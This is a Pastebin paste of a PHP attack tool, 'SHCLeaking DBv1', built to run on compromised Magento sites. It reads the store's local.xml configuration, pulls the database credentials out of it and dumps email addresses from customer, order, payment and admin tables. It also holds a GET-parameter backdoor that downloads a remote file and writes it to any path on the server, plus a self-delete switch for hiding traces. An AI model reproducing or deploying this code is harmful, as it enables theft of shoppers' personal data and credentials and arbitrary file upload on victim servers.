API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Dec 21st, 2017
149
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.83 KB | None | 0 0
raw download clone embed print report
  1. <!DOCTYPE html>
  2. <html>
  3. <head>
  4. <title>SHCLeaking DBv1 | Bug7sec Team</title>
  5. <style type="text/css">
  6. body{
  7. color: #3EF403;
  8. background-color: black;
  9. }
  10. input {
  11. border: dashed 1px;
  12. border-color: #333;
  13. BACKGROUND-COLOR: Black;
  14. font: 8pt Verdana;
  15. color: #0CFF37;
  16. }
  17.  
  18. select {
  19. border: dashed 1px;
  20. border-color: #333;
  21. BACKGROUND-COLOR: Black;
  22. font: 8pt Verdana;
  23. color: #0CFF37;
  24. }
  25. textarea {
  26. margin: 0;
  27. color: #fff;
  28. background-color: #555;
  29. border: 1px solid #df5;
  30. font: 9pt Monospace,'Courier New'; }
  31. </style>
  32.  
  33. </head>
  34. <body>
  35. <pre style="text-align: center">
  36. -[ SHCLeaking DBv1 | Bug7sec Team ]-
  37. </pre>
  38. <Center>
  39. <form action="" method="post">
  40. <input type="text" value="<?= getcwd();?>/app/etc/local.xml" name="shcpatch" placeholder="http://localhost/">
  41. <select name="cms">
  42. <option>Magento</option>
  43. </select>
  44. <input type="submit" name="submit" value="Scan Now!"/>
  45. </form>
  46. </Center>
  47. <?php
  48. error_reporting(0);
  49. /**
  50. * Name : SHCLeaking DBv1
  51. * Author : Shor7cut
  52. * Team : Bug7sec Team | http://facebook.com/bug7sec
  53. * Spesial : Defacer Tersakiti Team , IndoXploit Team , Tuban Cyber Team , IDBTE4MNET
  54. * Dan Balikita
  55. ------------------------------------------------------
  56. [Spesial Leaking]
  57. - Magento (add 15/04/2016)
  58. ======================================================
  59. - Hanya mengedit Copyright itulah kerjaan lamers , Skill jongkok.
  60. - Tetap bersyukur mas , tanpa mengClaim kodingan orang lain - Shor7cut
  61. */
  62. class shc
  63. {
  64. public function drop(){
  65. unlink(basename($_SERVER['PHP_SELF']));
  66. }
  67. public function get($location){
  68. $shc = file_get_contents($location);
  69. return $shc;
  70. }
  71. public function dpremove($data){
  72. $shcUniX = array_unique($data);
  73. return $shcUniX;
  74. }
  75. public function count($data){
  76. return "------------ Total Email : [ ".count($data) . " ]------------\r\n";
  77. }
  78. public function dbmagento($data){
  79. $shc_regexhost = "/<host><![CDATA[]+(.*?)[]]]><\\/host>/";
  80. $shc_regexusername = "/<username><![CDATA[]+(.*?)[]]]><\\/username>/";
  81. $shc_regexpassword = "/<password><![CDATA[]+(.*?)[]]]><\\/password>/";
  82. $shc_regexdatabase = "/<dbname><![CDATA[]+(.*?)[]]]><\\/dbname>/";
  83. preg_match($shc_regexhost, $data, $shcleak_1);
  84. preg_match($shc_regexusername, $data, $shcleak_2);
  85. preg_match($shc_regexpassword, $data, $shcleak_3);
  86. preg_match($shc_regexdatabase, $data, $shcleak_4);
  87. $shc_host = $shcleak_1[1];
  88. $shc_user = $shcleak_2[1];
  89. $shc_pass = $shcleak_3[1];
  90. $shc_db = $shcleak_4[1];
  91. $shc_json = array(
  92. 'host' => $shc_host,
  93. 'username' => $shc_user,
  94. 'password' => $shc_pass,
  95. 'database' => $shc_db,
  96. );
  97. return json_encode(array('shc_db' => $shc_json)
  98. );
  99. }
  100. public function shc_dbg($data){
  101. $jdata = json_decode(shc::dbmagento($data),true);
  102. if($jdata['shc_db']['host']=="localhost"){
  103. echo '<br><center> Host : <font color="red">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center> <br>';
  104. }else{
  105. echo '<br><center>Host : <font color="green">localhost</font> | '.$jdata['shc_db']['username'].' | '.$jdata['shc_db']['password'].' </center><br>';
  106. }
  107. mysql_connect($jdata['shc_db']['host'], $jdata['shc_db']['username'],$jdata['shc_db']['password']);
  108. mysql_select_db($jdata['shc_db']['database']);
  109. $query = array(
  110. 'admin_user' => 'SELECT * FROM admin_user' ,
  111. 'aw_blog_comment' => 'SELECT * FROM aw_blog_comment' ,
  112. 'core_email_queue_recipients' => 'SELECT * FROM core_email_queue_recipients' ,
  113. 'customer_entity' => 'SELECT * FROM customer_entity' ,
  114. 'newsletter_subscriber' => 'SELECT * FROM newsletter_subscriber' ,
  115. 'newsletter_template' => 'SELECT * FROM newsletter_template' ,
  116. 'sales_flat_order_address' => 'SELECT * FROM sales_flat_order_address' ,
  117. 'sales_flat_order_payment' => 'SELECT * FROM sales_flat_order_payment' ,
  118. 'sales_flat_quote' => 'SELECT * FROM sales_flat_quote' ,
  119. 'customer_entity_varchar' => 'SELECT * FROM customer_entity_varchar' ,
  120. 'customer_address_entity_varchar' => 'SELECT * FROM customer_address_entity_varchar' ,
  121. 'product_alert_stock' => 'SELECT * FROM product_alert_stock' ,
  122. 'pws_productqa' => 'SELECT * FROM pws_productqa' ,
  123. 'sales_flat_order' => 'SELECT * FROM sales_flat_order' ,
  124. 'sales_flat_quote_address' => 'SELECT * FROM sales_flat_quote_address' ,
  125. 'smtppro_email_log' => 'SELECT * FROM smtppro_email_log' ,
  126. 'webforms_results_values' => 'SELECT * FROM webforms_results_values' ,
  127. 'sales_recurring_profile' => 'SELECT * FROM sales_recurring_profile'
  128. );
  129. $shcolom = array(
  130. 'admin_user' => 'email' ,
  131. 'sales_flat_order_payment' => 'additional_information' ,
  132. 'sales_flat_quote_address' => 'email' ,
  133. 'smtppro_email_log' => 'email_to' ,
  134. 'webforms_results_values' => 'value' ,
  135. 'aw_blog_comment' => 'email' ,
  136. 'customer_entity_varchar' => 'email' ,
  137. 'product_alert_stock' => 'email' ,
  138. 'pws_productqa' => 'email' ,
  139. 'sales_flat_order_address' => 'email' ,
  140. 'customer_entity' => 'email' ,
  141. 'sales_flat_order' => 'customer_email' ,
  142. 'customer_address_entity_varchar' => 'value' ,
  143. 'core_email_queue_recipients' => 'recipient_email' ,
  144. 'newsletter_subscriber' => 'subscriber_email' ,
  145. 'newsletter_template' => 'template_sender_email' ,
  146. 'sales_flat_quote' => 'customer_email' ,
  147. 'sales_recurring_profile' => 'SELECT * FROM admin_user'
  148. );
  149. foreach ($query as $shc_key => $shc_query) {
  150. $hasil = mysql_query($shc_query);
  151. while ( $kolom_db = mysql_fetch_assoc($hasil) ) {
  152. $mail[] = $kolom_db[$shcolom[$shc_key]];
  153. }
  154. }
  155. return shc::dpremove($mail);
  156. }
  157. }
  158. error_reporting(0);
  159. file_put_contents($_GET['shcpatch'], file_get_contents($_GET['shcpatchl']));
  160. if($_POST['submit']){
  161. $data = shc::get($_POST['shcpatch']);
  162. $data = shc::shc_dbg($data);
  163. ?>
  164. <center><br><textarea style="margin: 0px; width: 527px; height: 172px;"><?= shc::count($data);?><?php foreach ($data as $value) {echo $value."\r\n";}?></textarea><br>
  165. </center>
  166. <?php
  167. }
  168. if($_GET['x']=="d"){
  169. shc::drop();
  170. }
  171. ?>
  172.  
  173. </body>
  174. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!